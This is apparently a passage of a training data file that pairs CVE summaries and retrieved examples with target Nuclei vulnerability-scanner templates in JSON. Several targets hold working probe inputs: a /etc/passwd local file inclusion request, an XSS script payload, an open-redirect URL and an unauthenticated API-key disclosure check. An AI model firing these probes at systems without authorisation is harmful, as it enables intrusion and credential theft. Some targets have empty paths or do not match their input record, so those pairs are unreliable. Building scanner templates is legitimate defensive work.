"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2025-1974-k8s",
"severity": "critical",
"tags": [
"cve",
"cve2025",
"cloud",
"devops",
"kubernetes",
"ingress",
"nginx",
"k8s",
"k8s-cluster-security"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "https://github.com/bonitasoft/bonita-web",
"snippet": "PoC available at https://github.com/bonitasoft/bonita-web"
},
{
"source": "nvd",
"url": "https://rhinosecuritylabs.com/application-security/cve-2022-25237-bonitasoft-authorization-bypass/",
"snippet": "PoC available at https://rhinosecuritylabs.com/application-security/cve-2022-25237-bonitasoft-authorization-bypass/"
},
{
"source": "nvd",
"url": "https://github.com/bonitasoft/bonita-web",
"snippet": "PoC available at https://github.com/bonitasoft/bonita-web"
},
{
"source": "nvd",
"url": "https://rhinosecuritylabs.com/application-security/cve-2022-25237-bonitasoft-authorization-bypass/",
"snippet": "PoC available at https://rhinosecuritylabs.com/application-security/cve-2022-25237-bonitasoft-authorization-bypass/"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2022-25237",
"info": {
"name": "Bonita Web 2021.2 - Authentication/Authorization Bypass",
"author": "Sourabh-Sahu",
"severity": "critical",
"description": "Bonita Web 2021.2 contains an authentication/authorization bypass vulnerability caused by an overly broad exclude pattern in RestAPIAuthorizationFilter, allowing unauthenticated users to access privileged API endpoints by appending ;i18ntranslation or /../i18ntranslation/ to the URL.\n",
"tags": [
"cve",
"cve2022",
"bonita",
"auth-bypass",
"intrusive",
"file-upload",
"rce",
"vkev",
"vuln"
],
"reference": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-25237",
"https://rhinosecuritylabs.com/application-security/cve-2022-25237-bonitasoft-authorization-bypass/",
"https://bonitasoft.com/"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
},
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
},
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
},
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "dsl",
"dsl": [
"status_code == 200",
"contains(content_type, \"application/json\")",
"regex(\"uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)\", body)"
],
"condition": "and"
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 4,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2022-25237",
"timestamp": "2025-11-13T15:15:44.121160Z"
}
}
|
CVE-2024-6842
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2024-6842",
"summary": "In version 1.5.5 of mintplex-labs/anything-llm, the `/setup-complete` API endpoint allows unauthorized users to access sensitive system settings. The data returned by the `currentSettings` function includes sensitive information such as API keys for search engines, which can be exploited by attackers to steal these keys and cause loss of user assets.",
"affected_products": [
{
"vendor": "mintplexlabs",
"product": "anythingllm",
"version_range": "*"
}
],
"paths": [],
"indicators": [
"unauthorized"
],
"severity_hint": "high"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2023-4911",
"severity": "high",
"tags": [
"cve",
"cve2023",
"code",
"glibc",
"looneytunables",
"linux",
"privesc",
"local",
"kev",
"gnu",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "https://huntr.com/bounties/cd911fc7-ac6b-4974-acd0-9cc926fa8d9e",
"snippet": "PoC available at https://huntr.com/bounties/cd911fc7-ac6b-4974-acd0-9cc926fa8d9e"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2024-6842",
"info": {
"name": "AnythingLLM - Information Disclosure",
"author": "ingbunga,rahaaaiii,asteria121,breakpack,gy741",
"severity": "high",
"description": "AnythingLLM suffers from an information disclosure vulnerability through the `/api/setup-complete` API endpoint. By accessing this endpoint, a remote and unauthenticated attacker can access sensitive configuration of the target AnythingLLM instance. This detection is included in the AI and LLM category.\n",
"tags": [
"cve",
"cve2024",
"unauth",
"exposure",
"anything-llm",
"mintplex-Labs",
"vuln"
],
"reference": [
"https://huntr.com/bounties/cd911fc7-ac6b-4974-acd0-9cc926fa8d9e",
"https://nvd.nist.gov/vuln/detail/CVE-2024-6842"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/api/setup-complete"
],
"matchers": [
{
"type": "dsl",
"dsl": [
"contains_all(body, \"AuthToken\\\":true\", \"ApiKey\\\":true\")",
"contains(header, \"application/json\")",
"status_code == 200"
],
"condition": "and"
},
{
"type": "word",
"part": "body",
"words": [
"\"AgentGoogleSearchEngineId\":",
"-\"AgentGoogleSearchEngineKey\":'",
"\"AgentSerperApiKey\":",
"\"AgentBingSearchApiKey\":"
],
"condition": "or"
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2024-6842",
"timestamp": "2025-11-13T15:15:47.105494Z"
}
}
|
CVE-2020-29227
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2020-29227",
"summary": "An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the \"page\" parameter, to cause local file inclusion resulting in code execution.",
"affected_products": [
{
"vendor": "car_rental_management_system_project",
"product": "car_rental_management_system",
"version_range": "*"
}
],
"paths": [
"/index.php"
],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "critical"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2019-14287",
"severity": "high",
"tags": [
"packetstorm",
"cve",
"cve2019",
"sudo",
"code",
"linux",
"privesc",
"local",
"canonical",
"sudo_project",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2021-3156",
"severity": "high",
"tags": [
"packetstorm",
"cve",
"cve2021",
"sudo",
"code",
"linux",
"privesc",
"local",
"kev",
"sudo_project",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5",
"snippet": "PoC available at https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5"
},
{
"source": "nvd",
"url": "https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html",
"snippet": "PoC available at https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html"
},
{
"source": "nvd",
"url": "https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5",
"snippet": "PoC available at https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5"
},
{
"source": "nvd",
"url": "https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html",
"snippet": "PoC available at https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2020-29227",
"info": {
"name": "Car Rental Management System 1.0 - Local File Inclusion",
"author": "daffainfo",
"severity": "critical",
"description": "Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the \"page\" parameter, leading to code execution.",
"tags": [
"cve",
"cve2020",
"lfi",
"car_rental_management_system_project",
"sqli",
"vkev",
"vuln"
],
"reference": [
"https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5",
"https://nvd.nist.gov/vuln/detail/CVE-2020-29227",
"https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html",
"https://github.com/ARPSyndicate/cvemon",
"https://github.com/ARPSyndicate/kenzer-templates"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/index.php?page=/etc/passwd%00"
],
"matchers": [
{
"type": "regex",
"part": "body",
"regex": [
"root:.*:0:0:"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2020-29227",
"timestamp": "2025-11-13T15:15:42.464127Z"
}
}
|
CVE-2008-1547
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2008-1547",
"summary": "Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter.",
"affected_products": [
{
"vendor": "microsoft",
"product": "exchange_server",
"version_range": "*"
}
],
"paths": [
"/bin/redir.asp"
],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2020-0646",
"severity": "critical",
"tags": [
"cve",
"cve2020",
"net-framework",
"sharepoint",
"microsoft",
"packetstorm",
"rce",
"kev",
"oast",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "http://securityreason.com/securityalert/4441",
"snippet": "PoC available at http://securityreason.com/securityalert/4441"
},
{
"source": "nvd",
"url": "http://www.securityfocus.com/archive/1/497374/100/0/threaded",
"snippet": "PoC available at http://www.securityfocus.com/archive/1/497374/100/0/threaded"
},
{
"source": "nvd",
"url": "http://www.securityfocus.com/archive/1/497390/100/0/threaded",
"snippet": "PoC available at http://www.securityfocus.com/archive/1/497390/100/0/threaded"
},
{
"source": "nvd",
"url": "http://www.securityfocus.com/archive/1/497433/100/0/threaded",
"snippet": "PoC available at http://www.securityfocus.com/archive/1/497433/100/0/threaded"
},
{
"source": "nvd",
"url": "http://www.securityfocus.com/archive/1/497500/100/0/threaded",
"snippet": "PoC available at http://www.securityfocus.com/archive/1/497500/100/0/threaded"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2008-1547",
"info": {
"name": "Microsoft OWA Exchange Server 2003 - 'redir.asp' Open Redirection",
"author": "ctflearner",
"severity": "medium",
"description": "Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter.\n",
"tags": [
"cve2008",
"cve",
"redirect",
"owa",
"exchange",
"microsoft",
"vuln"
],
"reference": [
"https://nvd.nist.gov/vuln/detail/CVE-2008-1547",
"https://www.exploit-db.com/exploits/32489",
"http://securityreason.com/securityalert/4441",
"https://exchange.xforce.ibmcloud.com/vulnerabilities/46061",
"https://github.com/tr3ss/newclei"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/exchweb/bin/redir.asp?URL=https://interact.sh",
"{{BaseURL}}/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0"
],
"matchers": [
{
"type": "regex",
"part": "header",
"regex": [
"(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"
]
}
],
"stop_at_first_match": true
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2008-1547",
"timestamp": "2025-11-13T15:15:40.276047Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "detect-dangling-cname",
"severity": "info",
"tags": [
"dns",
"takeover",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "dns-waf-detect",
"severity": "info",
"tags": [
"tech",
"waf",
"dns",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "dissenter",
"info": {
"name": "Dissenter User Name Information - Detect",
"author": "dwisiswant0",
"severity": "info",
"description": "Dissenter user name information check was conducted.",
"tags": [
"osint",
"osint-political",
"dissenter",
"discovery"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"https://dissenter.com/user/{{user}}"
],
"matchers": [
{
"type": "status",
"status": [
200
]
},
{
"type": "word",
"part": "body",
"words": [
"Dissenter | The Comment Section of the Internet"
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-dissenter",
"timestamp": "2025-11-13T15:15:51.742678Z"
}
}
|
api-ipinfo
|
[CANONICAL_RECORD]
{
"cve_id": "api-ipinfo",
"summary": "IPinfo API Test. This template detects IPinfo API Test by checking specific patterns and responses.",
"affected_products": [],
"paths": [
"https://ipinfo.io/?token={{token}}"
],
"indicators": [
"\"ip\"",
"\"city\"",
"\"org\"",
"\"postal\"",
"\"timezone\""
],
"severity_hint": "info"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-api-public",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "api-ipinfo",
"info": {
"name": "IPinfo API Test",
"author": "0xpugal",
"severity": "info",
"description": "IPinfo API Test. This template detects security vulnerabilities.",
"tags": [
"token-spray",
"ipinfo"
],
"reference": [
"https://ipinfo.io/developers"
]
},
"requests": [
{
"method": "GET",
"path": [
"https://ipinfo.io/?token={{token}}"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"\"ip\"",
"\"city\"",
"\"org\"",
"\"postal\"",
"\"timezone\""
],
"condition": "and"
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-api-ipinfo",
"timestamp": "2025-11-13T15:16:06.591510Z"
}
}
|
CVE-2022-29005
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2022-29005",
"summary": "Multiple cross-site scripting (XSS) vulnerabilities in the component /obcs/user/profile.php of Online Birth Certificate System v1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fname or lname parameters.",
"affected_products": [
{
"vendor": "phpgurukul",
"product": "online_birth_certificate_system",
"version_range": "*"
}
],
"paths": [
"/obcs/user/profile.php"
],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2023-4911",
"severity": "high",
"tags": [
"cve",
"cve2023",
"code",
"glibc",
"looneytunables",
"linux",
"privesc",
"local",
"kev",
"gnu",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "https://github.com/sudoninja-noob/CVE-2022-29005/blob/main/CVE-2022-29005.txt",
"snippet": "PoC available at https://github.com/sudoninja-noob/CVE-2022-29005/blob/main/CVE-2022-29005.txt"
},
{
"source": "nvd",
"url": "https://github.com/sudoninja-noob/CVE-2022-29005/blob/main/CVE-2022-29005.txt",
"snippet": "PoC available at https://github.com/sudoninja-noob/CVE-2022-29005/blob/main/CVE-2022-29005.txt"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2022-29005",
"info": {
"name": "Online Birth Certificate System 1.2 - Stored Cross-Site Scripting",
"author": "TenBird",
"severity": "medium",
"description": "Online Birth Certificate System 1.2 contains multiple stored cross-site scripting vulnerabilities in the component /obcs/user/profile.php, which allows an attacker to execute arbitrary web script or HTML via a crafted payload injected into the fname or lname parameters.\n",
"tags": [
"cve",
"cve2022",
"xss",
"obcs",
"authenticated",
"phpgurukul",
"vuln"
],
"reference": [
"https://github.com/sudoninja-noob/CVE-2022-29005/blob/main/CVE-2022-29005.txt",
"https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/",
"https://nvd.nist.gov/vuln/detail/CVE-2022-29005",
"http://online.com",
"https://github.com/ARPSyndicate/kenzer-templates"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "dsl",
"dsl": [
"contains(header_3, \"text/html\")",
"status_code_3 == 200",
"contains(body_3, 'admin-name\\\">{{str}}<script>alert(document.domain);</script>')"
],
"condition": "and"
}
],
"max_redirects": 2
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2022-29005",
"timestamp": "2025-11-13T15:15:44.233348Z"
}
}
|
api-abstract-vat-validation-rates
|
[CANONICAL_RECORD]
{
"cve_id": "api-abstract-vat-validation-rates",
"summary": "Stay compliant with our simple, reliable, and powerful API for all your domestic and cross-border sales.",
"affected_products": [],
"paths": [
"https://vat.abstractapi.com/v1/?api_key={{token}}&vat_number=SE556656688001"
],
"indicators": [
"\"vat_number\":",
"\"is_vat_valid\":",
"\"company_name\":"
],
"severity_hint": "info"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-api-public",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "api-abstract-vat-validation-rates",
"info": {
"name": "Abstract Api VAT Validation Rates Test",
"author": "daffainfo",
"severity": "info",
"description": "Stay compliant with our simple, reliable, and powerful API for all your domestic and cross-border sales.",
"tags": [
"token-spray",
"abstractapi"
],
"reference": [
"https://www.abstractapi.com/api/vat-validation-rates-api",
"https://github.com/daffainfo/all-about-apikey/tree/main/abstract-vat-validation-rates"
]
},
"requests": [
{
"method": "GET",
"path": [
"https://vat.abstractapi.com/v1/?api_key={{token}}&vat_number=SE556656688001"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"\"vat_number\":",
"\"is_vat_valid\":",
"\"company_name\":"
],
"condition": "and"
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-api-abstract-vat-validation-rates",
"timestamp": "2025-11-13T15:16:06.499886Z"
}
}
|
nethermind-server-detect
|
[CANONICAL_RECORD]
{
"cve_id": "nethermind-server-detect",
"summary": "Nethermind is a high-performance, highly configurable full Ethereum protocol execution client built on .NET that runs on Linux, Windows, and macOS, and supports Clique, Aura, and Ethash. By default Nethermind runs a JSON-RPC HTTP server on port 8545/TCP\n",
"affected_products": [],
"paths": [],
"indicators": [
"Nethermind JSON-RPC HTTP Server - Detect",
"detected"
],
"severity_hint": "info"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-api-public",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "nethermind-server-detect",
"info": {
"name": "Nethermind JSON-RPC HTTP Server - Detect",
"author": "Nullfuzz",
"severity": "info",
"description": "Nethermind is a high-performance, highly configurable full Ethereum protocol execution client built on .NET that runs on Linux, Windows, and macOS, and supports Clique, Aura, and Ethash. By default Nethermind runs a JSON-RPC HTTP server on port 8545/TCP\n",
"tags": [
"tech",
"nethermind",
"ethereum",
"web3",
"blockchain",
"discovery"
],
"reference": [
"https://nethermind.io/",
"https://docs.nethermind.io/nethermind/ethereum-client/json-rpc/web3",
"https://github.com/NethermindEth/nethermind"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "dsl",
"dsl": [
"status_code == 200",
"contains(header, \"application/json\")",
"contains(body, \"Nethermind\")"
],
"condition": "and"
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-nethermind-server-detect",
"timestamp": "2025-11-13T15:15:53.393668Z"
}
}
|
magento-installer
|
[CANONICAL_RECORD]
{
"cve_id": "magento-installer",
"summary": "Magento is susceptible to the Installation page exposure due to misconfiguration.",
"affected_products": [],
"paths": [
"{{BaseURL}}/index.php/install/"
],
"indicators": [
"Magento Installation Wizard",
"Welcome to Magento's Installation Wizard!",
"text/html"
],
"severity_hint": "high"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
